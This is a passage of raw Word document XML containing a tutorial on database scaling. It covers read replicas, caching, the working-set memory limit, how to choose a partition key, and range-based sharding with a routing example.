    <w:p w14:paraId="18931904" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3378DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>2. Read replicas (replication for read scaling):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B0518E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Eliminates write scaling — all writes still go to one primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4235B949" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Adds replication lag complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2211F35F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Does NOT help: write throughput, working set exceeding RAM, total data size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B252CA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451EC99A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>3. Caching (Redis, Memcached):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928F7F4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Eliminates read load for cacheable data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD31C5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Does NOT help: write-heavy workloads, uncacheable queries, total data storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B1C25" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE39F85" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>4. Functional decomposition (microservices with separate databases):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336B7042" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Split different domains into separate databases (users DB, orders DB, inventory DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBE5DA2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Each domain scales independently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111AD889" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Does NOT help: when a single domain's data exceeds one database's capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF1BA96" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8FFCE2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>5. Sharding (horizontal partitioning):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E555A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Use when: single domain's write rate, storage, or working set exceeds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2412A7B4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">             what any single machine can handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8704A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Introduces: routing, distributed queries, rebalancing complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B8C72A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The working set limit — the most common trigger for sharding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBD488A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4794850A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>PostgreSQL on 256GB RAM instance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C09F3C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Buffer pool (shared_buffers): ~64GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A98908" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  OS page cache: ~128GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FAAF47" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Effective working set in memory: ~192GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6123198C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A97F923" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>If frequently accessed data ("hot data") &gt; 192GB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533D6F0F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Each working-set miss → disk read (~100µs NVMe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DA66E4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  At 100,000 queries/second with 10% cache miss rate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AA2DDE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    10,000 disk reads/second × 100µs = 1 second of disk I/O per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE6D00" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    I/O fully saturated → latency spikes → cascading queuing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18985A31" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C8BE54" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Solution: shard so each shard's hot data fits in that shard's memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A5CA7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  4 shards, each 25% of data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69015F16" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Each shard's working set: ~50GB (easily fits in 256GB RAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A9C8D3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    No disk reads for hot data → latency maintained at sub-millisecond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308A2DD4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Partition Key — The Most Important Sharding Decision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400CFC80" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>partition key</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> (shard key) is the column or combination of columns that determines which shard a given row belongs to. Every other sharding decision flows from this choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3F9636" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What makes a good partition key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B727C0C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120D9774" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Properties of an ideal partition key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E77EE5F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4A0072F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>1. High cardinality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E46B636" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Many distinct values → fine-grained distribution across shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C8F89A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Low cardinality (boolean, enum with few values) → hot spots inevitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF6149F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2481E816" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Bad:  shard by status (3 values: active/inactive/pending)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B1630B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">         All 'active' rows on one shard → severe hot spot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3168AC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Good: shard by user_id (millions of distinct values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488979DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D14ABA3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>2. Even distribution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D096753" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Values uniformly distributed → balanced load across shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCDD68F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Skewed distribution → some shards overloaded, others idle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD0C15" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB55D45" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Bad:  shard by country (US has 10× more users than Norway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C7D929" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">         US shard overloaded, Norway shard mostly idle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E2E378" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Good: shard by user_id hash (uniform distribution regardless of user's country)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D49E2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12485465" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>3. Locality of common queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA72BE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Most queries should touch only one shard (avoids cross-shard scatter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0670CAE1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Related data should be on the same shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3023C3ED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672018B0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   E-commerce: shard by user_id → all of a user's orders, cart, address on one shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555FFD9D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Multi-tenant SaaS: shard by tenant_id → all tenant data on one shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E915C88" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0997A7D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>4. Low update frequency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0EEC87" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   The partition key value must remain stable (or migration is required)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4994AF77" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   If user changes email and shard key is email → must move all user data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C3973" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4ED16" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Good: internal immutable IDs (user_id, tenant_id, order_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C982595" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Bad:  mutable business attributes (email, username, status)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E68EA2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFABDF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>5. Consistent access from all query paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7456496D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Every query that needs data must be able to determine the shard key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4BCA51" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Without shard key: scatter-gather across all shards (expensive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9D58AC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625F90C1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Query: SELECT * FROM orders WHERE order_id = 12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074126E4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Shard key: user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697DA615" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Problem: order_id doesn't tell you the user_id → scatter-gather required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145968BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Solution: store (order_id → user_id) mapping, or shard by order_id instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45141731" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="52B0FCBD">
          <v:rect id="_x0000_i5855" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECA884C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Sharding Strategies — The Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADB88C1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Range-Based Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431A0FFB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Each shard owns a contiguous range of the partition key space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3EF0B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18565130" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42757042" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Partition key: user_id (integer, 0 to 1,000,000,000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E607B4E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shards: 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46672552" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7E0F874A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 1: user_id 0         to 249,999,999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C60D2E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Shard 2: user_id 250,000,000 to 499,999,999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF47BBF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 3: user_id 500,000,000 to 749,999,999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3C26A7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 4: user_id 750,000,000 to 999,999,999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A3AD76" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="124244B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1352C07A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  shard_id = floor(user_id / 250,000,000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AED14C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A04DAB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  user_id = 387,234,567 → shard_id = floor(387M / 250M) = 1 → Shard 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D052AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Range-based sharding advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700030C7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525C2725" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
